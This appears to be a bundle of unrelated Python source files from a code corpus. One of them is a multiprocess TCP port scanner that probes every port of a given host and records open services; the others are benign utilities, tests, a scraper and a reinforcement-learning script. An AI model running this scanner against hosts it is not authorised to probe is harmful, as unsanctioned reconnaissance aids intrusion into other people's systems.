    # Sequencing-run metadata.
    num_libraries_in_run = columns.Integer()
    sequencer_id = columns.Text()
    extraction = columns.Text()
    panel = columns.Text()
    target_pool = columns.Text()
    # Coverage statistics.
    num_reads = columns.Integer()
    mean_coverage = columns.Float()
    thresholds = columns.List(columns.Integer)
    # Maps each coverage threshold to the percent of base pairs covered at it.
    perc_bp_cov_at_thresholds = columns.Map(columns.Integer, columns.Float)
class AmpliconCoverage(Model):
    """Same coverage metrics as SampleCoverage, but partitioned by
    ``amplicon`` for amplicon-centric queries.
    """
    __keyspace__ = 'coveragestore'
    amplicon = columns.Text(primary_key=True, partition_key=True)
    sample = columns.Text(primary_key=True)
    run_id = columns.Text(primary_key=True)
    library_name = columns.Text(primary_key=True)
    program_name = columns.Text(primary_key=True)
    # Sequencing-run metadata.
    num_libraries_in_run = columns.Integer()
    sequencer_id = columns.Text()
    extraction = columns.Text()
    panel = columns.Text()
    target_pool = columns.Text()
    # Coverage statistics.
    num_reads = columns.Integer()
    mean_coverage = columns.Float()
    thresholds = columns.List(columns.Integer)
    # Maps each coverage threshold to the percent of base pairs covered at it.
    perc_bp_cov_at_thresholds = columns.Map(columns.Integer, columns.Float)
| StarcoderdataPython |
3375805 | """
This script demonstrates the following:
- How to scan a target host for known ports and other port ranges from 0 - 65536
My primary focus while coding this script is to LEARN how to program in Python. It is NOT my intention
to cause any harm to 3rd parties (people and/or organizations)
Example:
python port_scanner
Attention:
    - This script has only been tested on a Windows development environment
- OS = Windows 10 Home Edition (64-bit)
- OS Version = Microsoft Windows [Version 10.0.16299.371]
- Laptop = Dell XPS 15 9550
- RAM = 16GB
- Physical Cores = 4
- Logical Cores = 8
- It takes ~ 18 minutes to scan the ports for a given target host with current environment and
settings
- Increase the max_processes_factor_per_cpu to boost parallelism
Recommendations:
- AWS -> Enable GuardDuty and monitor threat event as the following
[
{
"schemaVersion": "2.0",
"accountId": "",
"region": "us-west-2",
"partition": "aws",
"id": "",
"arn": "",
"type": "Recon:EC2/PortProbeUnprotectedPort",
"resource": {
"resourceType": "Instance",
"instanceDetails": {
"instanceId": "",
"instanceType": "t2.micro",
"launchTime": "2018-04-17T18:55:49Z",
...
}
},
"service": {
"serviceName": "guardduty",
"detectorId": "",
"action": {
"actionType": "PORT_PROBE",
...
"resourceRole": "TARGET",
"additionalInfo": {
"threatName": "Scanner",
"threatListName": "ProofPoint"
},
"eventFirstSeen": "2018-04-17T19:31:08Z",
"eventLastSeen": "2018-04-17T22:07:07Z",
"archived": false,
"count": 14
},
"severity": 2,
"createdAt": "2018-04-17T19:36:20.448Z",
"updatedAt": "2018-04-17T22:17:23.779Z",
"title": "Unprotected port on EC2 instance is being probed.",
"description": "EC2 instance has an unprotected port which is being probed by a known malicious host."
}
]
"""
import multiprocessing
import os
import time
import uuid
from datetime import datetime
from socket import *
from typing import List
def get_max_degree_of_parallelism() -> int:
    """Return the max degree of parallelism for resource governance purposes.

    Returns:
        The maximum number of scanner processes allowed to run concurrently
        (a fixed multiple of the logical CPU count).
    """
    # os.cpu_count() may return None when the count cannot be determined;
    # fall back to 1 so the scanner can still make progress.
    logical_processor_count = os.cpu_count() or 1
    # Processes allowed per logical CPU. Port probing is I/O bound (each
    # probe mostly waits on a 1-second socket timeout), so oversubscribing
    # the CPUs increases throughput. Lower this factor to throttle usage.
    max_processes_factor_per_cpu = 8
    return max_processes_factor_per_cpu * logical_processor_count
def start_process_for_range(output_directory: str,
                            target_host: str,
                            known_ports: List[int],
                            target_port_start: int,
                            target_port_end: int,
                            running_processes: List[multiprocessing.Process])\
        -> multiprocessing.Process:
    """Starts a new process to scan a port range for a given target host
    Args:
        output_directory: The output directory where opened ports will be written too.
        target_host: The target host (e.g. www.google.com)
        known_ports: The list of known ports (e.g. 80/HTTP, etc.).
        target_port_start: The target port range start number (e.g. 1).
        target_port_end: The target port range end number (e.g. 1000, exclusive).
        running_processes: The list of processes currently running; the new
            process is appended to it (mutated in place).
    Returns:
        The process that was just created and started.
    """
    # Each worker scans its own sub-range via try_connect_range; the caller
    # throttles how many of these are alive at once.
    current_process = multiprocessing.Process(
        target=try_connect_range,
        args=(output_directory, target_host, known_ports, target_port_start, target_port_end,))
    running_processes.append(current_process)
    current_process.start()
    return current_process
def throttle_process_start(start_time: datetime,
                           running_processes: List[multiprocessing.Process],
                           completed_processes: List[multiprocessing.Process],
                           max_degree_of_parallelism: int):
    """Throttles creating new processes for resource governance purposes.

    Blocks until the number of live processes drops below
    ``max_degree_of_parallelism``, moving finished processes from
    ``running_processes`` to ``completed_processes`` (both mutated in place).

    Args:
        start_time: The overall scan start date/time (used for progress output).
        running_processes: The running processes to be throttled.
        completed_processes: The processes that completed execution so far.
        max_degree_of_parallelism: The max degree of desired parallelism.
    """
    is_throttled = False
    while len(running_processes) >= max_degree_of_parallelism:
        is_throttled = True
        # BUG FIX: iterate over a snapshot -- removing items from the list
        # being iterated makes Python skip the element that slides into the
        # removed item's slot, so finished processes could be missed.
        for current_process in list(running_processes):
            if not current_process.is_alive():
                completed_processes.append(current_process)
                running_processes.remove(current_process)
                if len(running_processes) < max_degree_of_parallelism:
                    break
        time.sleep(0.1)  # avoid a busy-wait while workers finish
    # Tracks running time so far if throttling was applied
    if is_throttled:
        end_time = datetime.now()
        print("\n--- Ranges => Completed = {0}; Running = {1}; Partial Elapsed Time = {2} ---"
              .format(len(completed_processes), len(running_processes), end_time - start_time))
def try_connect(target_host, target_port):
    """Return a bool indicating whether the connection was successfully established or not.
    Args:
        target_host (string): The target host to try to connect
        target_port (int): The target port to try to connect
    Returns:
        bool: True if the connection was successfully established to the target host and port.
        Otherwise, it returns False
    """
    try:
        # AF_INET -> IPv4 address family.
        # SOCK_STREAM -> connection-oriented (TCP) socket, which provides full
        # error detection and correction facilities.
        with socket(AF_INET, SOCK_STREAM) as soc:
            # Sets timeout to 1 second so closed/filtered ports fail fast
            soc.settimeout(1)
            # .connect (()) because address is a tuple:
            # connect to a TCP service listening on (host, port)
            soc.connect((target_host, target_port))
            print("\n***** Port '{0}' = OPEN *****".format(target_port))
            return True
    except OSError:
        # BUG FIX: was a bare ``except``, which also swallowed
        # KeyboardInterrupt/SystemExit and made the scanner hard to abort.
        # OSError covers socket.timeout, ConnectionRefusedError and
        # gaierror (DNS failures).
        return False
def try_connect_range(output_directory: str,
                      target_host: str,
                      known_ports: List[int],  # annotation fixed: was List[multiprocessing.Process], a copy/paste slip
                      target_port_start: int,
                      target_port_end: int):
    """ Tries to connect to a range of ports one at a time. If connection is successful, an entry
    will be added to a file ({UUID}_open_ports.txt) in the output directory
    Args:
        output_directory: The output directory where opened ports will be written too.
        target_host: The target host (e.g. www.google.com)
        known_ports: The list of known ports (e.g. 80/HTTP, etc.), skipped here
            because they are scanned up-front by the caller.
        target_port_start: The target port range start number (e.g. 1).
        target_port_end: The target port range end number (e.g. 1000, exclusive).
    """
    current_process = multiprocessing.current_process()
    # Each worker writes to its own UUID-named file, so concurrent processes
    # never contend for the same output file.
    random_uuid = uuid.uuid4()
    process_open_port_file_name = "{0}_open_ports.txt".format(random_uuid)
    process_open_port_file_path = os.path.join(output_directory, process_open_port_file_name)
    # Scans target host for high ports
    print("\n[PID {0}] Scanning host '{1}' ports from '{2}' to '{3}'"
          .format(current_process.pid, target_host, target_port_start, target_port_end))
    # range() excludes target_port_end; the caller passes the next range's
    # start as this range's end, so no port is scanned twice.
    for target_port in range(target_port_start, target_port_end):
        if target_port not in known_ports:
            if try_connect(target_host, target_port):
                # Write opened ports to an output file named with UUID created above
                with open(process_open_port_file_path, "a") as process_open_port_file:
                    process_open_port_file.write("{0}\n".format(target_port))
def try_get_ipv4(target_host: str) -> object:
    """Resolve and return the IPv4 address of *target_host*.

    Args:
        target_host: Host name to resolve (e.g. www.google.com).

    Returns:
        The dotted-quad IPv4 string on success, otherwise ``None``.
    """
    try:
        resolved = gethostbyname(target_host)
    except Exception as ex:
        print("Failed to resolve host '{0}' IPv4 address. Exception: {1}."
              .format(target_host, ex))
        return None
    print("Host '{0}' IPv4 is '{1}'".format(target_host, resolved))
    return resolved
def scan(output_directory: str,
         target_host: str):
    """Scans target host for opened ports: first the well-known ports, then
    the rest of the 1-65535 range split into chunks scanned in parallel.

    Open ports are appended to text files inside ``output_directory``
    (``known_open_ports.txt`` for the well-known ports, one UUID-named file
    per worker process for the ranged scan).

    Args:
        output_directory: Existing directory where results are written.
        target_host: The target host (e.g. www.google.com).

    Raises:
        ValueError: If an argument is empty/whitespace or a port is invalid.
        IOError: If the output directory does not exist.
    """
    if not output_directory or output_directory.isspace():
        raise ValueError("Output directory host cannot be none, empty or whitespace.")
    if not os.path.exists(output_directory):
        raise IOError("Output directory '{0}' was not found.".format(output_directory))
    if not target_host or target_host.isspace():
        raise ValueError("Target host cannot be none, empty or whitespace.")
    start_time = datetime.now()
    # Ensures IPv4 can be resolved before spending time scanning
    target_ipv4 = try_get_ipv4(target_host)
    if not target_ipv4 or target_ipv4 == "255.255.255.255":
        return
    # Scans target host for common ports
    print("\n***** Scanning host '{0}' COMMON ports (e.g. FTP, HTTP, etc.) *****"
          .format(target_host))
    known_ports = [
        21,    # FTP
        23,    # Telnet
        25,    # SMTP
        67,    # DHCP Client
        68,    # DHCP Server
        80,    # HTTP
        110,   # POP3
        135,   # RPC
        139,   # Common Internet File System (CIFS)
        143,   # IMAP
        1433,  # MS SQL Server
        1521,  # Oracle Database Server
        1723,  # VPN (PPTP)
        3306,  # MySQL
        3389,  # RPD (Windows)
    ]
    known_open_port_file_path = os.path.join(output_directory, "known_open_ports.txt")
    for target_port in known_ports:
        if target_port < 1:
            raise ValueError("Target must be greater than 0.")
        if try_connect(target_host, target_port):
            # Write opened ports to an output file
            with open(known_open_port_file_path, "a") as process_open_port_file:
                process_open_port_file.write("{0}\n".format(target_port))
    # Max degree of parallelism for resource governance purposes
    max_degree_of_parallelism = get_max_degree_of_parallelism()
    # Scans target host for high ports
    print("\n***** Scanning host '{0}' OTHER port ranges (Max Degree of Parallelism = {1}) *****"
          .format(target_host, max_degree_of_parallelism))
    # List of processes that will run to scan different port ranges
    running_processes = []
    completed_processes = []
    target_port_start = 1
    max_port_number = 65536  # (Exclusive)
    range_step = 100
    for target_port_end in range(range_step, max_port_number, range_step):
        start_process_for_range(output_directory, target_host, known_ports, target_port_start,
                                target_port_end, running_processes)
        target_port_start = target_port_end
        throttle_process_start(start_time, running_processes, completed_processes,
                               max_degree_of_parallelism)
    # Run the remaining port range (65500-65535).
    # BUG FIX: the original passed ``target_port_end`` here, which equals
    # ``target_port_start`` after the loop, producing an empty range and
    # silently skipping the last 36 ports; the tail must run up to
    # ``max_port_number``.
    start_process_for_range(output_directory, target_host, known_ports, target_port_start,
                            max_port_number, running_processes)
    for process in running_processes:
        process.join()
    end_time = datetime.now()
    print("\n***** Completed scanning (Elapsed Time => {0}) *****".format(end_time - start_time))
| StarcoderdataPython |
1696107 | """A package for computing overall grades in courses @ UCSD."""
from .io import (
read_egrades_roster,
read_canvas,
read_gradescope,
write_canvas_grades,
write_egrades,
)
from .gradebook import Gradebook, Assignments
from .scales import (
DEFAULT_SCALE,
ROUNDED_DEFAULT_SCALE,
map_scores_to_letter_grades,
average_gpa,
letter_grade_distribution,
plot_grade_distribution,
find_robust_scale,
)
| StarcoderdataPython |
9603050 | import sys
def printing(count,num):
    # Print one row of the multiplication table, e.g. "5  * 2  = 10".
    print(num," *",count," =",num*count)
def main():
    # argv[1] = base number of the table, argv[2] = how many rows to print.
    # NOTE(review): no argv-length validation -- missing args raise IndexError.
    num=sys.argv[1]
    num=int(num)
    til=int(sys.argv[2])
    count=1
    while(count<=til):
        printing(count,num)
        count=count+1
#main starts from here
main()
| StarcoderdataPython |
4841285 | <gh_stars>1-10
'''Definición de esquemas de JSON.'''
# JSON Schema (draft-07) describing one student ("alumno") record.
esquema_alumno = {
    "$schema": "http://json-schema.org/draft-07/schema#",
    "type": "object",
    "properties": {
        "Nombre": {"type": "string",
                   "minLength":1,
                   },
        "Primer Apellido": {"type": "string",
                            "minLength":1,},
        "Segundo Apellido": {"type": "string",
                             "minLength":1,},
        "Carrera": {"type": "string"},
        "Semestre": {"type": "number",
                     "minimum": 1,
                     "maximum": 50,},
        "Promedio": {"type": "number",  # grade point average on a 0-10 scale
                     "minimum": 0,
                     "maximum": 10,},
        "Al Corriente": {"type": "boolean"},
    },
    # "Segundo Apellido" is intentionally optional (not listed in "required").
    "required": ["Nombre", "Primer Apellido", "Carrera", "Semestre",
                 "Promedio", "Al Corriente"]
}
181224 | <gh_stars>1-10
"""Data structures to represent server information."""
from ark_rcon.datastructures.players import Players
from ark_rcon.datastructures.logline import LogLine
__all__ = ['Players', 'LogLine']
| StarcoderdataPython |
70239 | <filename>2021/07.py
from statistics import mean, median
import math
with open("input.txt") as fin:
positions = [int(i) for i in fin.read().split(",")]
def p1():
    # Part 1: linear fuel cost is minimised at the median of the positions.
    m = median(positions)
    return sum(abs(m - x) for x in positions)
def p2():
    """Part 2: minimal total fuel where moving k steps costs k*(k+1)/2.

    The optimum lies within one unit of the mean, but the original
    candidate range ``range(floor(m) - 1, floor(m) + 1)`` never tried
    ``ceil(m)`` and could miss the true minimum when the mean has a large
    fractional part; check the integers surrounding the mean instead.
    """
    m = mean(positions)
    candidates = range(math.floor(m) - 1, math.ceil(m) + 2)
    # abs(c - x)/2 * (abs(c - x) + 1) is the triangular number k*(k+1)/2.
    return min(
        sum(abs(c - x) / 2 * (abs(c - x) + 1) for x in positions)
        for c in candidates
    )
print(p2())
| StarcoderdataPython |
8093325 | <reponame>mkazmier/torchmtlr
import pytest
import torch
import numpy as np
from torchmtlr.utils import encode_survival, make_time_bins
# Discretised time bins shared by the parametrised cases below.
bins = torch.arange(1, 5, dtype=torch.float)
# (time, event, expected one-hot target, bins): events mark their bin with a
# single 1; censored samples (event == 0/False) get trailing 1s from the
# censoring bin onwards. The last two cases exercise batched tensor/ndarray
# inputs.
testdata = [
    (3., 1, torch.tensor([0, 0, 0, 1, 0]), bins),
    (2., 0, torch.tensor([0, 0, 1, 1, 1]), bins),
    (0., 1, torch.tensor([1, 0, 0, 0, 0]), bins),
    (6., 1, torch.tensor([0, 0, 0, 0, 1]), bins),
    (2., False, torch.tensor([0, 0, 1, 1, 1]), bins),
    (torch.tensor([3., 2.]), torch.tensor([1, 0]),
     torch.tensor([[0, 0, 0, 1, 0], [0, 0, 1, 1, 1]]), bins),
    (np.array([3., 2.]), np.array([1, 0]),
     torch.tensor([[0, 0, 0, 1, 0], [0, 0, 1, 1, 1]]), bins.numpy())
]


@pytest.mark.parametrize("time,event,expected,bins", testdata)
def test_encode_survival(time, event, expected, bins):
    # Each case must match its expected encoding exactly (element-wise).
    encoded = encode_survival(time, event, bins)
    assert torch.all(encoded == expected)
# testdata = [
# ]
# @pytest.mark.parametrize("times,num_bins,use_quantiles,event,expected", testdata)
# def test_make_time_bins(times, num_bins, use_quantiles, event, expected):
# bins = make_time_bins(times, num_bins, use_quantiles, event)
# assert torch.allclose(bins, expected)
| StarcoderdataPython |
3303610 | """This module purse VOH website to get the contents for podcast feed.
"""
import collections
from urllib.parse import urljoin, urlparse, urlunparse
import datetime
import re
import pytz
import requests
from bs4 import BeautifulSoup
from podcasts_utils import get_true_url
def get_articles_from_html(soup, url, no_items, podcast_title, item_titles=None):
    """
    Extract up to ``no_items`` podcast articles from a parsed VOH page.

    Args:
        soup: BeautifulSoup tree of the listing page.
        url: Base URL of the page, used to resolve relative links.
        no_items: Maximum number of items to extract.
        podcast_title: Currently unused.  # NOTE(review): dead parameter?
        item_titles: Optional list; when given, each article title is
            appended to it (mutated in place).

    Returns:
        A list of ``feed_article`` namedtuples with link, title,
        description, pub_date, media URL and MIME type.
    """
    # NOTE(review): the field names are passed as a *set*, so the positional
    # field order of the namedtuple is unpredictable; fields below are always
    # filled by keyword, so attribute access still works.
    feed_article = collections.namedtuple(
        'feed_article', {
            'link', 'title', 'description', 'pub_date', 'media', 'type'})
    articles = list()
    # debug = False
    count = 0
    items = soup.select('div.wrapper-item-large')
    for i in items:
        count = count + 1
        if count > no_items:
            break
        item = i.select_one('h3.title-article')
        link = urljoin(url, item.a.get('href'))
        title = item.text.strip()
        description = i.select_one('p.time').text.strip()
        # Page shows "HH:MM - DD/MM/YYYY"
        time_regex = r'(\d+):(\d+) - (\d+)/(\d+)/(\d+)'
        match = re.search(time_regex, description, re.M | re.I)
        vt_tz = pytz.timezone('Asia/Ho_Chi_Minh')
        year, month, day, hour, minute = int(match.group(5)), int(match.group(4)), int(
            match.group(3)), int(match.group(1)), int(match.group(2))
        # NOTE(review): astimezone() on a *naive* datetime interprets it in
        # the machine's local timezone and converts; if the page times are
        # already Vietnam local time this shifts them -- confirm whether
        # vt_tz.localize(...) was intended.
        pub_date = datetime.datetime(
            year, month, day, hour, minute).astimezone(vt_tz)
        print(link, title, pub_date)
        if item_titles != None:
            item_titles.append(title)
        # Fetch the article page to find the embedded <source> media element.
        spage = requests.get(link)
        ssoup = BeautifulSoup(spage.content, 'html.parser')
        # print(spage.content)
        rmedia = ssoup.select_one('source')['src']
        mime = ssoup.select_one('source')['type']
        parsed = urlparse(url)
        home = urlunparse((parsed[0], parsed[1], '', '', '', ''))  # NOTE(review): unused
        media = rmedia
        # # print(media)
        true_url = get_true_url(media)  # Get length of media file
        articles.append(
            feed_article(
                link=link,
                title=title,
                description=description,
                pub_date=pub_date,
                media=true_url,
                type=mime))
    return articles
| StarcoderdataPython |
4879504 | <gh_stars>1-10
import os, zipfile, random, string
import fnmatch
import numpy as np
from datetime import datetime
__all__ = ['dayends_from_timestamp', 'in_area', 'greate_circle_distance',
           'randstr', 'zipdir', 'zippylib', 'normalized']
try:
    from matplotlib.patches import FancyArrowPatch, Circle
    __all__.append('draw_network')
except ImportError:
    # matplotlib is optional: draw_network() is only exported when available.
    # BUG FIX: was a bare ``except`` (also swallowed KeyboardInterrupt etc.)
    # and the message misspelled "Warning".
    print("Warning: install `matplotlib` to use draw_network().")
def dayends_from_timestamp(ts):
    """Return the (start, end) datetimes of the "valid day" containing *ts*.

    A day is defined as running from 03:00 to 03:00 the next calendar day,
    so timestamps between midnight and 03:00 belong to the previous day.

    Args:
        ts: POSIX timestamp (seconds).

    Returns:
        Tuple ``(start, end)`` of naive local datetimes; ``end - start``
        is exactly one day.
    """
    from datetime import timedelta  # local import: module only exposes datetime
    dt = datetime.fromtimestamp(ts)
    sds = datetime(dt.year, dt.month, dt.day, 3)
    if dt.hour < 3:
        # Before 03:00 we are still inside the previous "valid day".
        # BUG FIX: the original used datetime(..., dt.day - 1, ...) and
        # sds.replace(day=sds.day + 1), both of which raise ValueError at
        # month boundaries (e.g. the 1st or 31st); timedelta handles
        # month/year rollover correctly.
        sds -= timedelta(days=1)
    eds = sds + timedelta(days=1)
    return (sds, eds)
def in_area(p, lb, rt):
    """Return True when point ``p`` (lon, lat) lies inside the rectangle
    spanned by the lower-left corner ``lb`` and upper-right corner ``rt``
    (boundaries inclusive)."""
    lon, lat = p[0], p[1]
    return lb[0] <= lon <= rt[0] and lb[1] <= lat <= rt[1]
def greate_circle_distance(lon0, lat0, lon1, lat1):
    """Great-circle distance (in km) between two points given in degrees of
    geographical coordinates, using the numerically stable arctan2 form of
    the Vincenty formula on a sphere."""
    EARTH_R = 6372.8  # mean Earth radius, km
    phi0, lam0 = np.radians(lat0), np.radians(lon0)
    phi1, lam1 = np.radians(lat1), np.radians(lon1)
    dlam = lam0 - lam1
    # Numerator and denominator of the central-angle arctangent.
    y = np.sqrt(
        (np.cos(phi1) * np.sin(dlam)) ** 2
        + (np.cos(phi0) * np.sin(phi1)
           - np.sin(phi0) * np.cos(phi1) * np.cos(dlam)) ** 2)
    x = np.sin(phi0) * np.sin(phi1) + np.cos(phi0) * np.cos(phi1) * np.cos(dlam)
    return EARTH_R * np.arctan2(y, x)
def radius_of_gyration(coordinates):
    """Radius of gyration (km) of a list of (lon, lat) coordinates: the mean
    great-circle distance of the points from their centroid."""
    clon = np.average([c[0] for c in coordinates])
    clat = np.average([c[1] for c in coordinates])
    distances = [greate_circle_distance(clon, clat, c[0], c[1])
                 for c in coordinates]
    return np.average(distances)
def zipdir(path, zipf=None, fnpat='*'):
    """Zip every file under *path* whose basename matches *fnpat*.

    Parameters
    ----------
    path:
        folder containing plain files to zip
    zipf:
        path to store zipped file; a random /tmp name is used when omitted,
        and a missing ``.zip`` suffix is appended.
    fnpat:
        Unix shell-style wildcards supported by
        `fnmatch.py <https://docs.python.org/2/library/fnmatch.html>`_

    Returns
    -------
    The path of the written archive.
    """
    if zipf is None:
        zipf = '/tmp/xoxo-' + randstr(10) + '.zip'
    elif not zipf.endswith('.zip'):
        zipf = zipf + ".zip"
    ziph = zipfile.ZipFile(zipf, 'w')
    try:
        for root, dirs, files in os.walk(path):
            # fnmatch.filter applies the same normalised matching as
            # fnmatch.fnmatch, one directory level at a time.
            for file_name in fnmatch.filter(files, fnpat):
                ziph.write(os.path.join(root, file_name))
        return zipf
    finally:
        ziph.close()
def zippylib(libpath, zipf=None):
    """A particular zip utility for a python module/package: archives the
    compiled ``.pyc`` members via PyZipFile and returns the archive path."""
    if zipf is None:
        zipf = '/tmp/xoxo-' + randstr(10) + '.zip'
    elif not zipf.endswith('.zip'):
        zipf += ".zip"
    ziph = zipfile.PyZipFile(zipf, 'w')
    try:
        ziph.debug = 3  # verbose: report each compiled/added file
        ziph.writepy(libpath)
        return zipf
    finally:
        ziph.close()
def randstr(len):
    """Return a random string of *len* lowercase ASCII letters.

    Note: the parameter shadows the ``len`` builtin; the name is kept for
    backward compatibility with existing callers.
    """
    # BUG FIX: ``string.lowercase`` is Python 2 only and raises
    # AttributeError on Python 3; the Python 3 name is ascii_lowercase.
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(len))
def normalized(a, axis=None, order=2):
    """Return *a* divided by its vector norm of the given *order* along
    *axis*; zero-norm slices are left unscaled (divided by 1)."""
    norms = np.atleast_1d(np.linalg.norm(a, order, axis))
    safe_norms = np.where(norms == 0, 1, norms)
    return a / safe_norms
| StarcoderdataPython |
1715807 | import collections
import logging
import pprint
class PprintArgsFilter(logging.Filter):
    '''Use pprint/pformat to pretty the log message args
    ie, log.debug("foo: %s", foo)
    this will pformat the value of the foo object.

    Note: the LogRecord is mutated in place, so every later handler sees
    the pformatted argument strings instead of the original objects.
    '''
    def __init__(self, name="", defaults=None):
        super(PprintArgsFilter, self).__init__(name=name)
        # ``defaults`` is stored but currently unused by filter().
        self.defaults = defaults or {}
    def filter(self, record):
        # Records logged with no %-args need no prettifying; True keeps them.
        if not record.args:
            return True
        # Modify the log record in place, replacing the arg
        # with a pprint'ed version of it's values.
        # TODO: could wrap with a callable to defer evaluating
        # the arg till the last minute
        # print("record.args1: %s" % list(record.args))
        # args can be a tuple or a dict/map, this bit is from logging.LogRecord.__init__
        args_map = {}
        if isinstance(record.args, collections.abc.Mapping):
            args_map = record.args
        if args_map:
            # Mapping case (log.debug("%(foo)s", {...})): rewrite values only;
            # mutating values while iterating items() is safe (keys unchanged).
            for arg, value in args_map.items():
                args_map[arg] = pprint.pformat(value)
            record.args = args_map
        else:
            record.args = tuple([pprint.pformat(x) for x in record.args])
        # record.args = tuple(pprint.pformat(x) for x in record.args)
        # print("record.args2: %s" % list(record.args))
        # for arg in record.args:
        #     print("arg: %s", arg)
        #     pretty_arg = pprint.pformat(record.args[arg])
        #     record.args[arg] = pretty_arg
        return True
| StarcoderdataPython |
3576727 | <reponame>francois-vincent/simply
# encoding: utf-8
import os.path
from simply import ROOTDIR
from simply.backends import docker, get_class
from simply.utils import ConfAttrDict
def test_version():
    """docker_version() reports a dotted three-part version string."""
    version = docker.docker_version()
    assert len(version.split('.')) == 3


def test_build():
    """Build an image from the named Dockerfile; clean the image up after."""
    docker.image_delete_and_containers('scratch')
    try:
        assert docker.docker_build('scratch')
        assert docker.get_images('scratch') == ['scratch']
    finally:
        docker.image_delete('scratch')


def test_build_inline():
    """Build an image from an inline Dockerfile string with an explicit tag."""
    inline = """
    FROM scratch
    CMD ["/bin/cat"]
    """
    docker.image_delete_and_containers('scratch')
    try:
        assert docker.docker_build(inline, tag='scratch')
        assert docker.get_images('scratch') == ['scratch']
    finally:
        docker.image_delete('scratch')


def test_container_delete():
    """Containers can be deleted both by image name and by container name."""
    docker.container_delete(image='busybox')
    try:
        # performs a test of docker_run by the way, so I removed test_run()
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        assert len(docker.get_containers(image='busybox')) == 1
        # delete by image name
        assert docker.container_delete(image='busybox')
        assert len(docker.get_containers(image='busybox')) == 0
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        # delete by container name
        containers = docker.get_containers(image='busybox')
        assert docker.container_delete(*containers)
        assert len(docker.get_containers(image='busybox')) == 0
    finally:
        docker.container_delete(image='busybox')


def test_exec():
    """docker_exec runs a command inside a running container and returns stdout."""
    docker.container_delete(image='busybox')
    try:
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        res = docker.docker_exec('ls', 'busybox').split('\n')
        assert len(res) > 9
        assert 'bin' in res
        assert 'etc' in res
    finally:
        docker.container_delete(image='busybox')
def test_get_data():
    """get_data reads a file's content out of a running container."""
    docker.container_delete(image='busybox')
    try:
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        res = docker.get_data('/etc/passwd', 'busybox').split('\n')
        assert 'root:x:0:0:root:/root:/bin/sh' in res
    finally:
        docker.container_delete(image='busybox')


def test_put_file():
    """put_file copies a local file into the container byte-for-byte."""
    docker.container_delete(image='busybox')
    try:
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        file = os.path.join(ROOTDIR, '__init__.py')
        assert docker.put_file(file, '/', 'busybox')
        with open(file, 'r') as f:
            content = f.read()
        assert content == docker.get_data('/__init__.py', 'busybox')
    finally:
        docker.container_delete(image='busybox')


def test_path_exists():
    """path_exists detects present and absent paths inside a container."""
    docker.container_delete(image='busybox')
    try:
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        assert docker.path_exists('/root', 'busybox')
        assert not docker.path_exists('/toto', 'busybox')
    finally:
        docker.container_delete(image='busybox')


def test_put_data():
    """put_data writes a string into a container file that reads back equal."""
    docker.container_delete(image='busybox')
    try:
        assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
        file = os.path.join(ROOTDIR, '__init__.py')
        with open(file, 'r') as f:
            content = f.read()
        assert docker.put_data(content, '/__init__.py', 'busybox')
        assert content == docker.get_data('/__init__.py', 'busybox')
    finally:
        docker.container_delete(image='busybox')
# Test DockerBackend
def test_docker_import():
    """Backend registry resolves 'docker' to the docker backend class."""
    conf = ConfAttrDict(
        backend='docker'
    )
    assert get_class(conf) is docker.this_class


def test_docker_conf():
    """init_backend derives defaults or honours explicit container/parameters."""
    conf = ConfAttrDict()
    db = docker.this_class()
    db.image = 'busybox'
    assert db.init_backend(conf)
    assert db.parameters is None
    # With no explicit container name, one is derived from the image name.
    assert db.container.startswith(db.image)
    conf = ConfAttrDict(
        container='busybox',
        parameters='-v /bin:/bin'
    )
    db = docker.this_class()
    db.image = 'busybox'
    assert db.init_backend(conf)
    assert db.container == conf.container
    assert db.parameters == conf.parameters


def test_docker_pull():
    """image_spec='.pull' fetches the image from the registry."""
    conf = ConfAttrDict(
        image_spec='.pull'
    )
    db = docker.this_class()
    db.image = 'busybox'
    assert db.init_backend(conf)
    assert db.build_image('uproot')
    assert db.image_exist()


def test_docker_build():
    """Default image_spec builds the image from a local Dockerfile."""
    conf = ConfAttrDict()
    db = docker.this_class()
    db.image = 'scratch'
    assert db.init_backend(conf)
    assert db.build_image('uproot')


def test_docker_build_path():
    """image_spec pointing at a directory builds from that Dockerfile path."""
    conf = ConfAttrDict(
        image_spec=os.path.join(ROOTDIR, 'images')
    )
    db = docker.this_class()
    db.image = 'scratch'
    assert db.init_backend(conf)
    assert db.build_image('uproot')
    assert db.image_exist()


def test_docker_build_inline():
    """image_spec holding Dockerfile text builds the image inline."""
    conf = ConfAttrDict(
        image_spec="""
        FROM scratch
        CMD ["/bin/cat"]
        """
    )
    db = docker.this_class()
    db.image = 'scratch'
    assert db.init_backend(conf)
    assert db.build_image('uproot')
    assert db.image_exist()
| StarcoderdataPython |
6411243 | # Generated by Django 2.0.10 on 2019-01-31 13:28
import articles.models
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the author FK to Article. Deleting a user reassigns the article
    # to a sentinel user (models.SET) instead of cascading the delete.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('articles', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='user',
            field=models.ForeignKey(on_delete=models.SET(articles.models.get_sentinel_user), to=settings.AUTH_USER_MODEL, verbose_name='文章作者'),
        ),
    ]
| StarcoderdataPython |
4957032 | # Library Imports
import os
import gym
import numpy as np
from GAIL import Agent
abs_path = os.getcwd()
# Load the Environment
env = gym.make('CartPole-v1')
# Load the Expert Dataset and Agent
expert_obs = np.load(
    abs_path+'/Expert/data/expert_DatasetStates.npy', allow_pickle=False)
expert_actions = np.load(
    abs_path+'/Expert/data/expert_DatasetAction.npy', allow_pickle=False)
agent = Agent(expert_obs, expert_actions, env, batch_size=64)
agent.memorize_expert()
n_games = 2500
score_history = []   # accumulated reward of every episode
avg_history = []     # 100-episode moving average per episode
best_score = env.reward_range[0]
avg_score = 0
for i in range(n_games):
    score = 0
    done = False
    # Initial Reset of Environment
    observation = env.reset()
    while not done:
        # Agent emits an action distribution; env.step takes its argmax index.
        action = agent.choose_action(observation)
        observation_, reward, done, info = env.step(np.argmax(action))
        observation = observation_
        score += reward
